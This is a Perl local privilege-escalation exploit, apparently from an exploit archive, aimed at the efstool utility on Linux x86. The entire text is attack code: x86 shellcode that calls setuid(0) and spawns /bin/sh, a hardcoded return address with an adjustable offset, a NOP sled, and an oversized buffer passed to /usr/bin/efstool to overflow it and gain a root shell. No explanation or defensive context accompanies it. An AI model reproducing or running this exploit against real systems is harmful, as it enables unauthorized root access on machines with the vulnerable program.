Efstool local root exploit for linux/x86 in perl.
0c20993f175a32aca30aedfa32968fd459cca1b2388fea27e1bb2440ec83fb14
#!/usr/bin/perl
# Another efstool exploit
$shell =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89".
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89".
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
$ret =0xbfffe590;
$buf = 3000;
$egg = 2000;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) { $offset = $ARGV[0]; }
$addr = pack('l', ($ret + $offset));
for ($i = 0; $i < $buf; $i += 4) {
$buffer .= $addr;
}
for ($i = 0; $i < ($egg - length($shell) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shell;
exec("/usr/bin/efstool $buffer");